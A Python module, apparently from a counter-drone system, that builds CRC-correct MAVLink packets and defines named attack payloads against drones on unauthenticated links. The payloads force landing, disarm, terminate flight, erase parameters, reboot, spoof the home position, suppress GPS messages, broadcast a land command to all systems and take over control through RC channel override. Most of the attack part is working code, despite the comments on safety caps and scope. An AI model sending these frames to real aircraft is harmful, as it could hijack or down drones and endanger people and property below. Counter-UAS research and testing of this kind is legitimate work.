"""Minimal MAVLink v1/v2 packet crafter.

Implements X.25 (CRC-16/MCRF4XX) CRC with per-message CRC_EXTRA seeds so that
packets generated here are byte-accurate and would be accepted by a real
MAVLink receiver (e.g. ArduPilot / PX4 / MAVProxy).

This is used purely for cUAS simulation and evaluation.
"""
from __future__ import annotations

import struct
from typing import Dict, List, Tuple

MAVLINK_STX_V1 = 0xFE
MAVLINK_STX_V2 = 0xFD

# ---- CRC-16/MCRF4XX (a.k.a. X.25 with reversed polynomial 0x8408) ----
def _crc16_mcrf4xx(data: bytes) -> int:
    crc = 0xFFFF
    for b in data:
        tmp = (b ^ crc) & 0xFF
        tmp = (tmp ^ (tmp << 4)) & 0xFF
        crc = ((crc >> 8) ^ (tmp << 8) ^ (tmp << 3) ^ (tmp >> 4)) & 0xFFFF
    return crc


# ---- CRC_EXTRA seeds for common MAVLink messages ----
# Source: mavlink/message_definitions/v1.0/common.xml (autogenerated seeds)
CRC_EXTRA: Dict[int, int] = {
    0: 50,     # HEARTBEAT
    1: 124,    # SYS_STATUS
    11: 89,    # SET_MODE
    20: 214,   # PARAM_REQUEST_READ
    21: 159,   # PARAM_REQUEST_LIST
    22: 220,   # PARAM_VALUE
    23: 168,   # PARAM_SET
    24: 24,    # GPS_RAW_INT
    30: 39,    # ATTITUDE
    33: 104,   # GLOBAL_POSITION_INT
    39: 254,   # MISSION_ITEM
    69: 243,   # MANUAL_CONTROL
    70: 124,   # RC_CHANNELS_OVERRIDE
    73: 38,    # MISSION_ITEM_INT
    76: 152,   # COMMAND_LONG
    77: 143,   # COMMAND_ACK
    109: 51,   # RADIO_STATUS
    111: 138,  # TIMESYNC
    140: 181,  # ACTUATOR_CONTROL_TARGET
    147: 154,  # BATTERY_STATUS
    242: 104,  # HOME_POSITION
    244: 90,   # MESSAGE_INTERVAL
    246: 8,    # ADSB_VEHICLE
    253: 83,   # STATUSTEXT
    # MAV_CMD messages piggy-back on COMMAND_LONG (msgid=76). Handled in payloads.
}

# ---- Known MAV_CMD IDs used by cUAS payloads ----
MAV_CMD = {
    "NAV_LAND": 21,
    "NAV_RETURN_TO_LAUNCH": 20,
    "NAV_TAKEOFF": 22,
    "COMPONENT_ARM_DISARM": 400,
    "DO_SET_MODE": 176,
    "DO_SET_ACTUATOR": 187,
    "DO_FLIGHTTERMINATION": 185,
    "DO_MOTOR_TEST": 209,
    "PREFLIGHT_STORAGE": 245,
    "PREFLIGHT_REBOOT_SHUTDOWN": 246,
    "DO_SET_HOME": 179,
    "SET_MESSAGE_INTERVAL": 511,
    "FLIGHTTERMINATION_DEACTIVATE": 186,
}


# =====================================================================
# F-7: SINGLE SOURCE OF TRUTH for the sustained maneuver-takeover (PL-011)
# safety cap and the link-override classification data. Previously the 30 s
# cap and the encrypted-protocol list were duplicated (with "keep in sync"
# comments) across payload_library.py, server.py, and
# field-bridge/mavlink_takeover.py — a safety cap that can silently drift is
# itself a hazard. They now live HERE, in the lowest-level module that every
# component already imports (backend/server.py & payload_library.py import
# mavlink_codec directly; field-bridge/mavlink_takeover.py adds backend/ to
# sys.path and imports it too), and everyone imports these names instead of
# re-declaring them.
# =====================================================================

# Hard cap on the sustained RC_CHANNELS_OVERRIDE controlled-landing window.
# Bounded engagement, NEVER transmit-forever.
MANEUVER_TAKEOVER_MAX_DURATION_S = 30.0

# Link protocols against which RC_CHANNELS_OVERRIDE (msg 70) is a NO-OP
# (encrypted / frequency-hopping / crypto-bound). A takeover targeting any of
# these is reported not-applicable and NOT transmitted. Match is
# case-insensitive / substring, since detection "protocol" strings vary.
ENCRYPTED_LINK_PROTOCOLS = (
    "elrs", "crsf", "expresslrs", "ocusync", "lightbridge", "dji",
    "dsmx", "dsm2", "spektrum", "frsky", "accst", "access", "flysky",
    "afhds", "hott", "ghst", "tbs", "crossfire", "encrypted", "fhss",
)

# Substrings that positively identify a legacy / unencrypted MAVLink-over-RF
# control link — the ONLY surface RC override actually works against.
LEGACY_MAVLINK_PROTOCOL_TOKENS = ("mavlink", "ardupilot", "px4", "sik")


def classify_override_link(protocol) -> str:
    """Classify a target's control-link protocol string for RC-override
    applicability. Returns one of:

      'encrypted'      — a recognized FHSS/encrypted link: override is a NO-OP.
      'legacy_mavlink' — a recognized legacy/unencrypted MAVLink link.
      'unknown'        — missing/empty/unrecognized protocol.

    Encrypted match takes precedence over legacy (a string mentioning both is
    treated as encrypted / not overridable)."""
    if not protocol:
        return "unknown"
    p = str(protocol).lower()
    if any(tok in p for tok in ENCRYPTED_LINK_PROTOCOLS):
        return "encrypted"
    if any(tok in p for tok in LEGACY_MAVLINK_PROTOCOL_TOKENS):
        return "legacy_mavlink"
    return "unknown"


def link_is_overridable(protocol, legacy_attested: bool = False) -> bool:
    """FAIL-CLOSED applicability gate for a control override (F-3).

    True ONLY when the target link plausibly accepts unauthenticated legacy
    MAVLink RC override:
      * encrypted/FHSS link  => False (NO-OP, refuse).
      * recognized legacy MAVLink link => True.
      * UNKNOWN/empty protocol => fail CLOSED (False) UNLESS the operator has
        explicitly attested the target is legacy MAVLink (legacy_attested=True).
        For a control override an unknown link type must never default to
        'allowed'."""
    cls = classify_override_link(protocol)
    if cls == "encrypted":
        return False
    if cls == "legacy_mavlink":
        return True
    # unknown / empty
    return bool(legacy_attested)


def build_command_long_payload(
    target_system: int,
    target_component: int,
    command: int,
    confirmation: int = 0,
    param1: float = 0.0,
    param2: float = 0.0,
    param3: float = 0.0,
    param4: float = 0.0,
    param5: float = 0.0,
    param6: float = 0.0,
    param7: float = 0.0,
) -> bytes:
    """MAVLink COMMAND_LONG payload (msgid=76). Field order per common.xml."""
    return struct.pack(
        "<fffffffHBBB",
        param1, param2, param3, param4, param5, param6, param7,
        command, target_system, target_component, confirmation,
    )


def _truncate_zero_bytes(payload: bytes) -> bytes:
    """MAVLink v2 payload trimming: drop trailing zero bytes (min 1)."""
    while len(payload) > 1 and payload[-1] == 0:
        payload = payload[:-1]
    return payload


def build_packet_v2(
    msgid: int,
    payload: bytes,
    system_id: int = 255,
    component_id: int = 190,
    sequence: int = 0,
    incompat_flags: int = 0,
    compat_flags: int = 0,
) -> bytes:
    """Assemble a MAVLink v2 frame."""
    if msgid not in CRC_EXTRA:
        raise ValueError(f"CRC_EXTRA not registered for msgid={msgid}")
    trimmed = _truncate_zero_bytes(payload)
    header = struct.pack(
        "<BBBBBBB",
        MAVLINK_STX_V2, len(trimmed), incompat_flags, compat_flags,
        sequence, system_id, component_id,
    )
    # msgid is 24-bit little-endian in v2
    msgid_bytes = bytes([msgid & 0xFF, (msgid >> 8) & 0xFF, (msgid >> 16) & 0xFF])
    frame_wo_crc = header[1:] + msgid_bytes + trimmed  # skip STX for CRC per spec
    crc_input = frame_wo_crc + bytes([CRC_EXTRA[msgid]])
    crc = _crc16_mcrf4xx(crc_input)
    return header + msgid_bytes + trimmed + struct.pack("<H", crc)


def build_packet_v1(
    msgid: int,
    payload: bytes,
    system_id: int = 255,
    component_id: int = 190,
    sequence: int = 0,
) -> bytes:
    """Assemble a MAVLink v1 frame (msgid must be <= 255)."""
    if msgid > 255:
        raise ValueError("MAVLink v1 supports msgid <= 255")
    if msgid not in CRC_EXTRA:
        raise ValueError(f"CRC_EXTRA not registered for msgid={msgid}")
    header = struct.pack(
        "<BBBBBBB",
        MAVLINK_STX_V1, len(payload), sequence, system_id, component_id, msgid,
        0,  # placeholder, not used; v1 header is 6 bytes actually
    )
    # v1 header is 6 bytes: STX,LEN,SEQ,SYSID,COMPID,MSGID
    header = bytes([MAVLINK_STX_V1, len(payload), sequence, system_id, component_id, msgid])
    crc_input = header[1:] + payload + bytes([CRC_EXTRA[msgid]])
    crc = _crc16_mcrf4xx(crc_input)
    return header + payload + struct.pack("<H", crc)


def hexdump(data: bytes, width: int = 16) -> List[str]:
    """Return classical hexdump lines: offset | hex | ascii."""
    lines: List[str] = []
    for offset in range(0, len(data), width):
        chunk = data[offset : offset + width]
        hex_bytes = " ".join(f"{b:02X}" for b in chunk).ljust(width * 3 - 1)
        ascii_bytes = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{offset:04X}  {hex_bytes}  |{ascii_bytes}|")
    return lines


def describe_packet(frame: bytes) -> Dict:
    """Human-readable summary of a MAVLink frame."""
    if not frame:
        return {"valid": False, "reason": "empty"}
    stx = frame[0]
    if stx == MAVLINK_STX_V2 and len(frame) >= 12:
        length = frame[1]
        return {
            "valid": True,
            "version": "v2",
            "stx": f"0x{stx:02X}",
            "payload_length": length,
            "incompat_flags": frame[2],
            "compat_flags": frame[3],
            "sequence": frame[4],
            "system_id": frame[5],
            "component_id": frame[6],
            "message_id": frame[7] | (frame[8] << 8) | (frame[9] << 16),
            "total_bytes": len(frame),
        }
    if stx == MAVLINK_STX_V1 and len(frame) >= 8:
        return {
            "valid": True,
            "version": "v1",
            "stx": f"0x{stx:02X}",
            "payload_length": frame[1],
            "sequence": frame[2],
            "system_id": frame[3],
            "component_id": frame[4],
            "message_id": frame[5],
            "total_bytes": len(frame),
        }
    return {"valid": False, "reason": "unknown STX or short frame"}


# ---- Named packet builders for the payload library ----
def payload_force_land(target_sys: int, target_comp: int = 1, seq: int = 0) -> bytes:
    p = build_command_long_payload(target_sys, target_comp, MAV_CMD["NAV_LAND"])
    return build_packet_v2(76, p, sequence=seq)


def payload_rth(target_sys: int, target_comp: int = 1, seq: int = 0) -> bytes:
    p = build_command_long_payload(target_sys, target_comp, MAV_CMD["NAV_RETURN_TO_LAUNCH"])
    return build_packet_v2(76, p, sequence=seq)


def payload_disarm(target_sys: int, target_comp: int = 1, seq: int = 0) -> bytes:
    # COMPONENT_ARM_DISARM: param1=0 disarm, param2=21196 force
    p = build_command_long_payload(target_sys, target_comp, MAV_CMD["COMPONENT_ARM_DISARM"], param1=0.0, param2=21196.0)
    return build_packet_v2(76, p, sequence=seq)


def payload_flight_termination(target_sys: int, target_comp: int = 1, seq: int = 0) -> bytes:
    # DO_FLIGHTTERMINATION: param1=1 activate
    p = build_command_long_payload(target_sys, target_comp, MAV_CMD["DO_FLIGHTTERMINATION"], param1=1.0)
    return build_packet_v2(76, p, sequence=seq)


def payload_propeller_stop(target_sys: int, target_comp: int = 1, seq: int = 0) -> bytes:
    # DO_MOTOR_TEST: param1=motor#, param2=0 (percent), param3=0 throttle, param4=timeout
    p = build_command_long_payload(target_sys, target_comp, MAV_CMD["DO_MOTOR_TEST"],
                                   param1=1.0, param2=0.0, param3=0.0, param4=1.0)
    return build_packet_v2(76, p, sequence=seq)


def payload_memory_erase(target_sys: int, target_comp: int = 1, seq: int = 0) -> bytes:
    # PREFLIGHT_STORAGE: param1=1 (write to persistent), param2=1 (reset params),
    # param3=1 (reset mission), param4=1 (reset log)
    p = build_command_long_payload(target_sys, target_comp, MAV_CMD["PREFLIGHT_STORAGE"],
                                   param1=2.0, param2=1.0, param3=1.0, param4=1.0)
    return build_packet_v2(76, p, sequence=seq)


def payload_reboot(target_sys: int, target_comp: int = 1, seq: int = 0) -> bytes:
    # PREFLIGHT_REBOOT_SHUTDOWN: param1=1 reboot autopilot
    p = build_command_long_payload(target_sys, target_comp, MAV_CMD["PREFLIGHT_REBOOT_SHUTDOWN"],
                                   param1=1.0, param2=0.0)
    return build_packet_v2(76, p, sequence=seq)


def payload_rth_spoof_home(target_sys: int, target_comp: int = 1, seq: int = 0,
                            lat: float = 0.0, lon: float = 0.0, alt: float = 0.0) -> bytes:
    # Injects a fake HOME_POSITION via DO_SET_HOME then triggers RTH.
    p = build_command_long_payload(target_sys, target_comp, MAV_CMD["DO_SET_HOME"],
                                   param1=0.0, param5=lat, param6=lon, param7=alt)
    return build_packet_v2(76, p, sequence=seq)


def payload_gnss_denial(target_sys: int, target_comp: int = 1, seq: int = 0) -> bytes:
    # SET_MESSAGE_INTERVAL: disable GPS_RAW_INT (id=24) by setting interval=-1
    import struct as _s
    payload = build_command_long_payload(target_sys, target_comp, MAV_CMD["SET_MESSAGE_INTERVAL"],
                                          param1=24.0, param2=-1.0)
    return build_packet_v2(76, payload, sequence=seq)


# =====================================================================
# Sustained-control primitives: RC_CHANNELS_OVERRIDE (70) / MANUAL_CONTROL (69)
# =====================================================================
# HONESTY / SCOPE (project rule DOC_CORRECTIONS_MEMO 3H — do not overstate):
#
#   These primitives inject operator-chosen stick/RC values into a target
#   autopilot's control path. They are ONLY effective against a craft that
#   already accepts unauthenticated/legacy MAVLink-over-RF on a link we can
#   write to — i.e. a pre-paired or unencrypted SiK-radio ArduPilot/PX4 craft,
#   the SAME attack surface the existing COMMAND_LONG takedowns exploit.
#
#   They DO NOT work against an FHSS / encrypted control link (ELRS/CRSF,
#   DJI OcuSync, Spektrum DSMX, frequency-hopping/hop-paired or crypto-bound
#   RC). Against such a link this is not a partial effect — it is NO effect:
#   the frames are ignored. Callers MUST report "takeover not applicable"
#   for an encrypted/hop-paired target rather than transmit uselessly. This
#   is a finer-grained neutralization effect on the legacy-MAVLink surface,
#   NOT a blanket "take over any drone".
#
# RC channel convention below follows ArduPilot's default map (chan1=roll,
# chan2=pitch, chan3=throttle, chan4=yaw). Channel mapping IS airframe
# specific; the controlled-descent values are a best-effort safe default, not
# a guarantee for an arbitrary airframe.

RC_CENTER_US = 1500      # neutral roll/pitch/yaw
RC_DESCENT_THROTTLE_US = 1300  # below mid-throttle: commands a gentle, controlled descent
RC_OVERRIDE_RELEASE = 0  # 0 => channel NOT overridden (released to the craft's own RC/failsafe)


def build_rc_channels_override_payload(
    target_system: int,
    target_component: int,
    chan1: int = RC_OVERRIDE_RELEASE,
    chan2: int = RC_OVERRIDE_RELEASE,
    chan3: int = RC_OVERRIDE_RELEASE,
    chan4: int = RC_OVERRIDE_RELEASE,
    chan5: int = RC_OVERRIDE_RELEASE,
    chan6: int = RC_OVERRIDE_RELEASE,
    chan7: int = RC_OVERRIDE_RELEASE,
    chan8: int = RC_OVERRIDE_RELEASE,
) -> bytes:
    """MAVLink RC_CHANNELS_OVERRIDE payload (msgid=70), base fields only.

    Wire order is MAVLink's size-sorted order: the eight uint16 channel values
    first, then the two uint8 ids. A channel value of 0 (or UINT16_MAX) means
    'do not override this channel'.
    """
    for c in (chan1, chan2, chan3, chan4, chan5, chan6, chan7, chan8):
        if not (0 <= c <= 0xFFFF):
            raise ValueError(f"RC channel value out of range: {c}")
    return struct.pack(
        "<HHHHHHHHBB",
        chan1, chan2, chan3, chan4, chan5, chan6, chan7, chan8,
        target_system, target_component,
    )


def build_manual_control_payload(
    target: int,
    x: int = 0,
    y: int = 0,
    z: int = 0,
    r: int = 0,
    buttons: int = 0,
) -> bytes:
    """MAVLink MANUAL_CONTROL payload (msgid=69), base fields only.

    x/y/z/r are int16 (-1000..1000; z often 0..1000 for throttle). Wire order
    is size-sorted: the four int16 axes, the uint16 buttons, then the uint8
    target.
    """
    for v in (x, y, z, r):
        if not (-1000 <= v <= 1000):
            raise ValueError(f"MANUAL_CONTROL axis out of range (-1000..1000): {v}")
    return struct.pack("<hhhhHB", x, y, z, r, buttons & 0xFFFF, target)


def _payload_from_frame(frame: bytes) -> bytes:
    """Extract the raw (possibly zero-trimmed for v2) payload from a frame."""
    if not frame:
        raise ValueError("empty frame")
    if frame[0] == MAVLINK_STX_V2:
        length = frame[1]
        return frame[10 : 10 + length]
    if frame[0] == MAVLINK_STX_V1:
        length = frame[1]
        return frame[6 : 6 + length]
    raise ValueError("unknown STX")


def decode_rc_channels_override(frame: bytes) -> Dict:
    """Round-trip decoder for a RC_CHANNELS_OVERRIDE frame (base fields)."""
    payload = _payload_from_frame(frame).ljust(18, b"\x00")[:18]
    vals = struct.unpack("<HHHHHHHHBB", payload)
    return {
        "chan_raw": list(vals[0:8]),
        "target_system": vals[8],
        "target_component": vals[9],
    }


def decode_manual_control(frame: bytes) -> Dict:
    """Round-trip decoder for a MANUAL_CONTROL frame (base fields)."""
    payload = _payload_from_frame(frame).ljust(11, b"\x00")[:11]
    x, y, z, r, buttons, target = struct.unpack("<hhhhHB", payload)
    return {"x": x, "y": y, "z": z, "r": r, "buttons": buttons, "target": target}


def payload_maneuver_takeover(target_sys: int, target_comp: int = 1, seq: int = 0) -> bytes:
    """One RC_CHANNELS_OVERRIDE frame commanding a CONTROLLED DESCENT.

    Roll/pitch/yaw held neutral (1500us), throttle driven below mid (1300us) to
    walk a legacy/unencrypted-MAVLink craft down to a safe landing rather than
    dropping it. Channels 5-8 are left released (0). This is ONE frame; the
    sustained neutralization effect comes from re-emitting it at the RC update
    rate for a BOUNDED, hard-capped duration — see field-bridge/mavlink_takeover.py
    and payload_library.py PL-011. See the module scope note above: NO effect
    against an FHSS/encrypted control link.
    """
    p = build_rc_channels_override_payload(
        target_sys, target_comp,
        chan1=RC_CENTER_US, chan2=RC_CENTER_US,
        chan3=RC_DESCENT_THROTTLE_US, chan4=RC_CENTER_US,
    )
    return build_packet_v2(70, p, sequence=seq)


def _self_check_sustained_control() -> None:
    """Round-trip self-verification, mirroring how the other codecs here prove
    themselves. Runs at import; raises on any packing/CRC regression."""
    frame = payload_maneuver_takeover(7, 1, seq=3)
    info = describe_packet(frame)
    assert info["valid"] and info["message_id"] == 70, info
    dec = decode_rc_channels_override(frame)
    assert dec["target_system"] == 7 and dec["target_component"] == 1, dec
    assert dec["chan_raw"][2] == RC_DESCENT_THROTTLE_US, dec
    assert dec["chan_raw"][0] == RC_CENTER_US, dec
    # MANUAL_CONTROL round-trip
    mc = build_manual_control_payload(3, x=100, y=-200, z=500, r=0, buttons=0)
    mframe = build_packet_v2(69, mc, sequence=1)
    minfo = describe_packet(mframe)
    assert minfo["valid"] and minfo["message_id"] == 69, minfo
    mdec = decode_manual_control(mframe)
    assert mdec["target"] == 3 and mdec["z"] == 500 and mdec["y"] == -200, mdec


_self_check_sustained_control()


def broadcast_takedown(seq: int = 0) -> bytes:
    """Broadcast COMMAND_LONG land to target_system=0 (all)."""
    p = build_command_long_payload(0, 0, MAV_CMD["NAV_LAND"])
    return build_packet_v2(76, p, sequence=seq)
